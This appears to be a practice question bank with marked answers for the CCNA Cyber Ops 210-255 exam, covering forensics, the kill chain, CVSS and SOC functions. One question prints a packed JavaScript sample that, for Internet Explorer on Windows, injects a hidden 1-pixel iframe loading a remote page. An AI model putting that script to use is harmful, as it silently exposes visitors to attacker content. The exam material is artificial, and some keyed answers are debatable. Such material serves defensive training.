Practice : CCNA Cyber Ops - SECOPS # 210-255

An employee was convicted by an organization for conducting corporate espionage using his personal mobile device. The device was taken into secure custody pending analysis. Which of the following is the most appropriate methodology for mobile device forensic investigation?

Options are :

  • To steer clear of unwanted interactions with any wireless devices, such as Bluetooth and Wi-Fi, the radios of the mobile should be turned off.
  • If the mobile's display is switched on, the screen's contents should be photographed. The details such as the time of calls, emails, and other application information should be captured. (Correct)
  • The mobile should be switched off immediately to prevent its interaction with the surrounding environment.
  • The mobile should be returned to its owner as there is no judicial custody on the same.

Answer : If the mobile's display is switched on, the screen's contents should be photographed. The details such as the time of calls, emails, and other application information should be captured.

Which two actions could indicate suspicious behavior that deviates from the baseline and is certainly worth investigating further? (Choose two.)

Options are :

  • regular crashing of host devices which was not seen earlier (Correct)
  • small uploads of any kind that are leaving the network
  • a lot of downloaded data such as software or web browsing
  • a spike in the amount of outbound traffic (Correct)
  • a lot of inbound traffic to the web server in the network

Answer : regular crashing of host devices which was not seen earlier; a spike in the amount of outbound traffic

When collecting evidence from the RAM, where should the forensic examiner look for data?

Options are :

  • Swap file (Correct)
  • Ext file
  • Log files
  • SAM file

Answer : Swap file

In the context of the Linux file system, which of the following allows fast file system recovery?

Options are :

  • Ext1
  • Journaling (Correct)
  • Ext2
  • FAT

Answer : Journaling

SQL injection attacks typically allow an attacker to perform which malicious activity?

Options are :

  • Inject malicious HTTP GET requests to obtain sensitive information stored on the SQL database of the web server.
  • Inject malicious SQL queries to obtain sensitive information from the back-end SQL database. (Correct)
  • Inject operating system commands to the vulnerable SQL database server.
  • Inject operating system commands to the vulnerable web server that has a trust relationship to the SQL database server.

Answer : Inject malicious SQL queries to obtain sensitive information from the back-end SQL database.

Which kind of evidence can be considered most reliable to arrive at an analytical assertion?

Options are :

  • direct (Correct)
  • corroborative
  • circumstantial
  • indirect
  • textual

Answer : direct

The process of relating multiple security event records to gain more clarity than is available from any security event record in isolation is called what?

Options are :

  • correlation (Correct)
  • normalization
  • summarization
  • corroboration
  • aggregation

Answer : correlation

During a forensic exercise, which of the following must be addressed first when investigating a cyber crime?

Options are :

  • Collecting and securing the evidence (Correct)
  • Protection of data gathered
  • Search and seizure of everything physically available at the crime scene
  • Engagement of legal and other law agencies

Answer : Collecting and securing the evidence

Which two statements are true regarding the installation or persistence phase in the cyber kill chain model? (Choose two.)

Options are :

  • Although the threat actor creates successful operations against the targeted host, individual or network, the attack cannot extend over a prolonged length of time.
  • The installation phase (or persistence phase) describes actions taken by the threat actor to establish a back door onto the targeted system. (Correct)
  • This phase does not survive system reboots and the attack needs to be initiated again.
  • Sustained access generally provides the threat actor a way to access the system whenever desired without alerting the system users or network defenders. (Correct)

Answer : The installation phase (or persistence phase) describes actions taken by the threat actor to establish a back door onto the targeted system. Sustained access generally provides the threat actor a way to access the system whenever desired without alerting the system users or network defenders.

Which of the following data recovery techniques can be used to recover partly lost or partly overwritten files?

Options are :

  • Hash replacement
  • File carving (Correct)
  • Data mining
  • Rainbow tables

Answer : File carving

Regarding the diamond model, what four nodes are used to model an intrusion? (Choose four.)

Options are :

  • adversary (Correct)
  • capability (Correct)
  • attacker
  • capacity
  • path
  • vector
  • infrastructure (Correct)
  • victim (Correct)
  • network

Answer : adversary, capability, infrastructure, victim

Which four of the following are attack capabilities that are available with the China Chopper RAT Trojan? (Choose four.)

Options are :

  • database management (Correct)
  • virtual terminal (command shell) (Correct)
  • brute force password (Correct)
  • file management (Correct)
  • crypto locker
  • SSL/TLS session decode

Answer : database management; virtual terminal (command shell); brute force password; file management

Which of the following is a concern regarding full packet capture data?

Options are :

  • 1. NIC performance features such as TCP segmentation offload can distort the collected full packet capture.
  • 2. Storage resources may limit the duration of full packet capture retention.
  • 3. The location of sensing interfaces affects the visibility that the data provides.
  • Numbered 1, 2, and 3 options are all concerns. (Correct)
  • Only numbered 2 and 3 options are concerns.

Answer : Numbered 1, 2, and 3 options are all concerns.

Which option creates a display filter on Wireshark on a host IP address or name?

Options are :

  • ip.address == or ip.network ==
  • [tcp|udp] ip.[src|dst] port
  • ip.addr == or ip.name ==
  • ip.addr == or ip.host == (Correct)

Answer : ip.addr == or ip.host ==

Which option describes the code that is shown here?

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai|showthread|php|72241732'.split('|'),0,{}))</script>

Options are :

  • normal JavaScript
  • Unicode-encoded script
  • obfuscated JavaScript (Correct)
  • Punycode-encoded script

Answer : obfuscated JavaScript

Which two statements are true regarding the command-and-control phase in the cyber kill chain model? (Choose two.)

Options are :

  • APT malware and most other forms of implants do not require manual interaction with the target to begin the process of data exfiltration or other reconnaissance actions that are external to the outside network.
  • CnC is the process of the external threat actor beaconing inbound connection to secure servers or hosts in an organization to establish a communication channel.
  • CnC is the process of the exploited hosts beaconing outbound or out of the network to an Internet-based controller to establish a communications channel. (Correct)
  • Once CnC is established with the exploited target, threat actors have access to the target system and ultimately the entire network itself. (Correct)

Answer : CnC is the process of the exploited hosts beaconing outbound or out of the network to an Internet-based controller to establish a communications channel. Once CnC is established with the exploited target, threat actors have access to the target system and ultimately the entire network itself.

From a security perspective, why is it important to employ a clock synchronization protocol on a network?

Options are :

  • to construct an accurate timeline of events when responding to an incident (Correct)
  • so that everyone knows the local time
  • to guarantee that updates are pushed out according to schedule
  • to ensure employees adhere to work schedule

Answer : to construct an accurate timeline of events when responding to an incident

The practice of digital forensics does not pertain to which of the following?

Options are :

  • Application of scientific principles to the analysis of evidence
  • Application of scientific principles to the preservation of evidence
  • Application of scientific principles to the collection of evidence
  • Application of scientific principles to the declaration of evidence (Correct)

Answer : Application of scientific principles to the declaration of evidence

Which of the following statements best describes metadata?

Options are :

  • Data about data (Correct)
  • Concealed data
  • Data about packet headers
  • Data important to the investigation

Answer : Data about data

An analyst is reviewing Sguil events relating to Windows Event logs being cleared by someone with "system level" privileges. Which action below might be the next step for the analyst to take?

Options are :

  • Disregard event as a false positive, as Windows Event logs are generally cleared on a routine basis.
  • Perform a sort based on destination IP to discover what other systems connected to the workstation. (Correct)
  • Download the Identity access logs from the Identity Access Manager server, to see who was accessing the machine 24 hours before the event.
  • Mitigate the issue by logging in to the Windows machine, and manually clear the Windows Event Logs as Administrator, thus resetting the access log entries.

Answer : Perform a sort based on destination IP to discover what other systems connected to the workstation.

Regarding log mining, which statement is true about log clustering?

Options are :

  • Log clustering can be used to make predictions about unknown future attacks or events.
  • Log clustering labels data packets, allowing them to traverse through the network on different paths but still remaining identifiable to the destination node when it is reconstructed.
  • Log clustering can be used to mine through large amounts of data to build profiles and to identify anomalous behavior. (Correct)
  • Log clustering is an interpretation of a chain of consecutive events that occur during a set period.
  • Log clustering can be used to reconstruct network traffic or to follow it.

Answer : Log clustering can be used to mine through large amounts of data to build profiles and to identify anomalous behavior.

Which of the following events is also known as a benign trigger?

Options are :

  • True positive
  • False positive (Correct)
  • True negative
  • False negative

Answer : False positive

The scope metric is part of which CVSS v3.0 metrics group?

Options are :

  • base (Correct)
  • maturity
  • temporal
  • environmental

Answer : base

Which type of threat actor poses the greatest security risk to an organization?

Options are :

  • hacktivist
  • insider threat (Correct)
  • script kiddie
  • nation-state threat actor

Answer : insider threat

Digital evidence is important in bringing the culprit to justice. When a forensic examiner accidentally alters or damages digital evidence, it is referred to as what?

Options are :

  • Contamination (Correct)
  • Manipulation
  • File probing
  • File carving

Answer : Contamination

Which of the following terms is used to describe the movement and location of physical evidence from the time it is obtained until the time it is presented in court?

Options are :

  • Chain of custody (Correct)
  • Chain of custodian
  • Client victim chain
  • Chain of evidence

Answer : Chain of custody

Which three processes and workflows often fall under the responsibilities of a SOC? (Choose three.)

Options are :

  • business applications software life-cycle management
  • threat intelligence and hunting (Correct)
  • end-user passwords change management
  • cybersecurity incident management (Correct)
  • governance and compliance management (Correct)

Answer : threat intelligence and hunting; cybersecurity incident management; governance and compliance management

The report confidence metric is part of which CVSS v3.0 metrics group?

Options are :

  • maturity
  • temporal (Correct)
  • base
  • environmental

Answer : temporal

In an organization dealing with important customer data, an employee deliberately deleted a file pertinent to a high value deal. Which Windows log is most likely to contain information about a file being deleted?

Options are :

  • IIS logs
  • SAM file
  • Security logs (Correct)
  • Configuration logs

Answer : Security logs

Which CVSSv3 metric captures the level of access that is required for a successful attack?

Options are :

  • attack complexity
  • attack vector
  • user interaction
  • privileges required (Correct)

Answer : privileges required

Which of the following is not a component of chain of custody?

Options are :

  • Time at which the evidence was acquired
  • The identification of the person who left the evidence (suspect) (Correct)
  • Who discovered the evidence
  • Location at which the evidence was acquired

Answer : The identification of the person who left the evidence (suspect)

A signature-driven IDS cannot do which of the following?

Options are :

  • Detect zero-day (Correct)
  • Be implemented in promiscuous as well as in-line modes.
  • Detect passively
  • Detect network anomalies

Answer : Detect zero-day

Which option can be addressed when using retrospective security techniques?

Options are :

  • why the malware is still in our network
  • if the affected system needs replacement
  • how the malware entered our network (Correct)
  • if the affected host needs a software update

Answer : how the malware entered our network

A security engineer placed a packet sniffer in the network as a routine corporate exercise. What is the purpose of using a packet sniffer in a network?

Options are :

  • To track network connections
  • To monitor network traffic (Correct)
  • To detect illegal packets on the network
  • To scan network segments for faults

Answer : To monitor network traffic

Incident handling is an example of which CSIRT service?

Options are :

  • reactive services (Correct)
  • aggressive services
  • proactive services
  • backup services
  • passive services
  • restore services

Answer : reactive services

Which of the following regular expressions will match any IP address on the 10.10.0.0/24 network?

Options are :

  • %10.10.0\.$
  • 10\.10\.0\..* (Correct)
  • 10.[10..0].0
  • %10.10.0.0*

Answer : 10\.10\.0\..*

Which CVSSv3 metric value increases when attacks consume network bandwidth, processor cycles, or disk space?

Options are :

  • availability (Correct)
  • complexity
  • confidentiality
  • integrity

Answer : availability

Which network device creates and sends the initial packet of a session?

Options are :

  • origination
  • destination
  • source (Correct)
  • network

Answer : source

Which section of the VERIS schema translates the incident details into a form that is more suitable for trending and analysis?

Options are :

  • incident description section (Correct)
  • incident tracking section
  • discovery and response section
  • impact assessment section
  • victim demographics section

Answer : incident description section

The CSIRT framework that defines a CSIRT can be described in terms of which four functions? (Choose four.)

Options are :

  • feedback
  • compliance
  • organization structure (Correct)
  • announcement
  • mission statement (Correct)
  • constituency (Correct)
  • relationships (Correct)
  • triage

Answer : organization structure, mission statement, constituency, relationships

Which information in the packet capture could be used to identify the suspicious behavior if the packet is encrypted using IPsec ESP transport mode?

Options are :

  • payload
  • MAC address
  • IP addresses and ports (Correct)
  • ESP header

Answer : IP addresses and ports
